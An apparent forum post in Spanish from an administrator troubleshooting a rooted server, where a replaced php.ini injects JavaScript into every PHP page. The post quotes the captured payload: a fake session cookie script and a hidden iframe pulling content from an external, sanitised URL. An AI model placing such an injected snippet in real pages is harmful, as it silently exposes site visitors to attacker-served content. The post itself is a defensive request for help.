ACTUALIZACIÓN: el servidor fue rooteado, se reemplazó php.ini que hizo que apareciera la inyección. Todavía no he descubierto qué directiva está inyectando el javascript.
Estoy solucionando problemas en un sitio web pirateado donde se inyecta un javascript en cada archivo PHP y solo en PHP. La inyección solo aparece en IE también. Tengo experiencia con la inyección antes, pero la mayoría de ellos se inyectaron a través de FTP, y puedes verlos en la propia página. No estoy viendo ningún virus o proceso malicioso en el servidor hasta ahora, y estoy empezando a pensar que el intérprete de PHP o Apache fue hackeado de alguna manera. ¿Alguien ha visto esto antes o sabe dónde debería mirar? La inyección está debajo,
<script type="text/javascript">
d=new Date();
d.setDate(d.getDate()+1);
document.cookie="PHPSESS1D=1; path=/; expires=" + d.toGMTString();
</script><style type="text/css">#yavvw {width: 10px;height: 10px;frameborder: no;visibility: hidden;scrolling: no;}</style><iframe id="yavvw" src="http://SANITISEDURL.net/ad.jpg?2"></iframe>
Esto le sucede a todos los sitios web en el servidor, incluso con un archivo PHP que solo tiene un eco simple. .htaccess se ve limpio para todos ellos. Servidor que ejecuta PHP 5.2.17 y Apache 2.2.17.